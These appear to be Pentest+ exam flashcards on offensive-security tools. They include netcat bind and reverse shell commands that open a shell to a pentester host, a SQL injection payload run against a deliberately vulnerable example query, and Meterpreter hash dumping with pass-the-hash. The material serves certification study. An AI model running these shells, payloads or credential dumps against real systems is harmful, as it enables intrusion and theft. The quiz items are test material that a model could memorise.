CompTIA Pentest+ for Dummies Chapter 9 Prep Test Flashcards
You want to perform a vulnerability scan of a system on the network. What tool would you use?
A.Hydra
B.Nessus
C.Maltego
D.SQLMap
B.Nessus
Explanation:
Nessus is a commercial network vulnerability scanner that assesses a system and identifies issues such as missing patches and weak security configuration. Hydra is a network login brute-forcer, Maltego is an OSINT tool and SQLMap automates SQL injection, so none of the other options performs a general vulnerability scan.
You are performing a pentest for a company and the company Intranet server is in the scope of the assessment.
What tool would you use to determine if there are any vulnerabilities with the web server?
A.Ncat
B.Maltego
C.Hashcat
D.Nikto
D.Nikto
Explanation:
Nikto is a web server vulnerability scanner: it checks the web server for outdated server software, dangerous files and directories, and configuration issues that leave it open to attack. Ncat is a networking utility, Maltego is an OSINT tool and Hashcat is a password cracker.
You would like to assess a core software application used by your customer while doing a penetration test.
What software assurance tool would you use to send random input to the application to assess how it responds?
A.nc
B.Hashcat
C.AFL
D.Mimikatz
C.AFL
Explanation:
In this scenario we are looking for a fuzzing tool.
AFL (American Fuzzy Lop) is a coverage-guided fuzzer: it feeds mutated, unexpected input to an application and watches for crashes or hangs that reveal how the application handles that input.
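To make the idea behind the AFL card concrete, here is an added example (written for this page, not code from AFL or from the book): a bare mutation fuzzer in Python that hammers a constructed toy record parser and collects every input that makes it raise. AFL is far more capable (it instruments the target and keeps inputs that reach new code), but the loop of mutate, run, record crash is the same; the parse_record target, SEED_INPUT and the mutation strategies are all assumptions made up for the example.

```python
import random
import struct


def parse_record(data: bytes) -> int:
    # Toy target constructed for this example: a 1-byte length prefix followed by
    # a little-endian uint32. The bug is that the length byte is trusted, so a
    # short or truncated record reaches struct.unpack and raises struct.error,
    # which stands in for a crash in a native program.
    length = data[0]
    payload = data[1:1 + length]
    (value,) = struct.unpack("<I", payload[:4])
    return value


SEED_INPUT = b"\x04\x2a\x00\x00\x00"  # constructed valid record: length 4, value 42


def mutate(rng: random.Random, sample: bytes) -> bytes:
    # One random mutation per call: bit flip, byte overwrite, truncation or
    # appended junk. AFL uses many more strategies and schedules them by coverage.
    buf = bytearray(sample)
    op = rng.choice(("flip", "overwrite", "truncate", "append"))
    if op == "flip" and buf:
        i = rng.randrange(len(buf))
        buf[i] ^= 1 << rng.randrange(8)
    elif op == "overwrite" and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif op == "truncate" and buf:
        del buf[rng.randrange(len(buf)):]
    else:
        buf += bytes(rng.randrange(256) for _ in range(rng.randrange(1, 4)))
    return bytes(buf)


def fuzz(target, seed: bytes, iterations: int = 500, rng_seed: int = 1) -> list:
    # Feed mutated inputs to the target and record every input that makes it
    # raise, together with the exception type. Returns [(input, exc_name), ...].
    rng = random.Random(rng_seed)
    crashes = []
    for _ in range(iterations):
        sample = mutate(rng, seed)
        try:
            target(sample)
        except Exception as exc:  # any uncaught exception counts as a crash
            crashes.append((sample, type(exc).__name__))
    return crashes


def reproduces(target, sample: bytes) -> bool:
    # Re-run a crashing input on its own, as you would when triaging a finding.
    try:
        target(sample)
    except Exception:
        return True
    return False


if __name__ == "__main__":
    found = fuzz(parse_record, SEED_INPUT)
    print(f"{len(found)} crashing inputs out of 500 runs")
    for sample, exc in found[:5]:
        print(sample.hex(), exc)
```

Every crash the loop reports is kept as the exact bytes that caused it, so it can be replayed against the target; that replay step is what turns a fuzzer's output into a reproducible bug report.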
You are performing an authorized pentest on a Windows server and have exploited the system with Metasploit and managed to get a meterpreter session.
What command would you use to obtain a list of password hashes for the accounts that reside on that system?
A.hashdump
B.hashit
C.sysinfo
D.hashcat
A.hashdump
Explanation:
hashdump is a Meterpreter post-exploitation command that dumps the LM and NT password hashes of the local accounts from the SAM; it needs SYSTEM privileges, so you may have to escalate or migrate into a SYSTEM process first.
After obtaining the hashes you can attempt to crack them with a tool such as John the Ripper or Hashcat (the hashcat option in the question is a cracker, not a Meterpreter command), or use an NT hash directly in a pass-the-hash attack.
You are assessing the security of a web application that connects to a database to display inventory data.
What tool would you use to test the web application against SQL injection attacks?
A.OpenVAS
B.Medusa
C.Cain and Abel
D.SQLmap
D.SQLmap
Explanation:
SQLMap is a tool that automates the detection and exploitation of SQL injection flaws in an application. OpenVAS is a general vulnerability scanner, Medusa is a login brute-forcer and Cain and Abel is a Windows password-recovery tool.
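The flaw SQLMap looks for, as an added example (written for this page, not SQLMap's code or anything from the book): a constructed inventory lookup written the vulnerable way next to the fixed version, plus the boolean-based probe that SQLMap starts with. The table, rows and function names are assumptions made up for the example; the point is that the same "hidden" row leaks through the concatenated query and stays hidden behind the parameterised one.

```python
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple[str, str, int]


def build_db() -> sqlite3.Connection:
    # Constructed inventory table for this example; the 'internal' flag marks
    # rows the application is never supposed to show to web users.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE inventory (sku TEXT, name TEXT, qty INTEGER, internal INTEGER)")
    conn.executemany(
        "INSERT INTO inventory VALUES (?, ?, ?, ?)",
        [("A100", "Widget", 12, 0), ("A200", "Gadget", 3, 0), ("Z999", "Prototype", 1, 1)],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, sku: str) -> List[Row]:
    # VULNERABLE: the SKU from the request is pasted into the SQL text, so a
    # quote in the input ends the string literal and the rest becomes SQL.
    query = f"SELECT sku, name, qty FROM inventory WHERE internal = 0 AND sku = '{sku}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, sku: str) -> List[Row]:
    # FIXED: a bound parameter reaches the engine as data and is never parsed as SQL.
    query = "SELECT sku, name, qty FROM inventory WHERE internal = 0 AND sku = ?"
    return conn.execute(query, (sku,)).fetchall()


Lookup = Callable[[sqlite3.Connection, str], List[Row]]


def boolean_blind_probe(conn: sqlite3.Connection, lookup: Lookup, sku: str) -> bool:
    # The boolean-based check sqlmap begins with: append a condition that is
    # always true, then one that is always false. If the two responses differ,
    # the input is reaching the SQL parser.
    true_case = lookup(conn, f"{sku}' AND '1'='1")
    false_case = lookup(conn, f"{sku}' AND '1'='2")
    return true_case != false_case


if __name__ == "__main__":
    db = build_db()
    payload = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))  # every row, internal one included
    print("safe      :", lookup_safe(db, payload))        # nothing: no SKU has that literal value
    print("probe vuln:", boolean_blind_probe(db, lookup_vulnerable, "A100"))
    print("probe safe:", boolean_blind_probe(db, lookup_safe, "A100"))
```

Note the precedence trap in the vulnerable query: `internal = 0 AND sku = '' OR '1'='1'` groups as `(internal = 0 AND sku = '') OR TRUE`, so the `internal = 0` filter is bypassed along with the SKU match.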
You are performing a pentest for Company XYZ.
You would like to generate a password list file from the contents of the customer website.
What tool would you use?
A.Medusa
B.CeWL
C.AFL
D.GDB
B.CeWL
Explanation:
CeWL (Custom Word List generator) spiders the pages of a website and collects the words used on them into a wordlist file that you can feed to password-cracking tools, on the theory that people pick passwords from vocabulary that appears in their own environment.
What tool would you use to crack password hashes that you have obtained in a previous step of your assessment? (Choose Two)
A.Peach Fuzzer
B.theHarvester
C.Cain and Abel
D.OWASP ZAP
E.John The Ripper
C.Cain and Abel
E.John The Ripper
Explanation:
Cain and Abel and John the Ripper are both password crackers. The other options are a fuzzer (Peach Fuzzer), an OSINT tool (theHarvester) and a web application scanner (OWASP ZAP).
You are looking to assess the security of a web application used by the company.
What tool would you use to assess the web application for security vulnerabilities?
A.Burp Suite
B.BeEF
C.Drozer
D.PowerSploit
A.Burp Suite
Explanation:
Burp Suite is an intercepting web proxy that also includes a web application vulnerability scanner, so it can be used both to inspect and modify requests and to test the application for flaws. BeEF targets browsers, Drozer assesses Android apps and PowerSploit is a PowerShell post-exploitation framework.
You wish to set up a bind shell on the target Windows system you are assessing whose IP address is 10.0.1.5. What command would you use on that system to set up the bind shell?
(A) nc 10.0.1.5 -p 5555 -e cmd.exe
(B) nc -n -v -l -p 5555 -e cmd.exe
(C) nc -10.0.1.5 -e cmd.exe
(D) nc -n -v -p 5555 -e cmd.exe
(B) nc -n -v -l -p 5555 -e cmd.exe
Explanation:
Because you are setting up a bind shell on the target system, the target is the side that listens, which is the -l (listen) switch on nc together with -p 5555 for the port; the attacker then connects in to 10.0.1.5:5555.
The target is a Windows system, so -e (run this program and attach it to the connection) should execute cmd.exe.
Note that -e exists only in some netcat builds, such as the Windows nc.exe, netcat-traditional and Ncat; the OpenBSD netcat shipped with many Linux distributions does not have it.
You would like to configure a reverse bind shell. Your pentester system has the IP address 10.0.1.2, while your Linux target has the IP address 10.0.1.5. What command would you use on a Linux target system for the reverse bind shell?
(A) nc -n -v 10.0.1.2 5555 -e cmd.exe
(B) nc -n -v -l 5555 10.0.1.2 -e /bin/bash
(C) nc -n -v 10.0.1.2 5555 -e /bin/bash
(D) nc -n -v -l 5555 10.0.1.5 -e cmd.exe
(C) nc -n -v 10.0.1.2 5555 -e /bin/bash
Explanation:
In this scenario you are setting up a reverse shell (the question's "reverse bind shell"), so the listener (-l) is on the pentester's system, not on the target.
Since the question asks what command you run on the target, you are looking for the command without -l: the one that connects out to the pentester's address and port, 10.0.1.2 5555.
The target is Linux, so -e should reference /bin/bash rather than cmd.exe. Answer (A) has the right direction but the wrong shell, while (B) and (D) both listen, which is the bind-shell direction.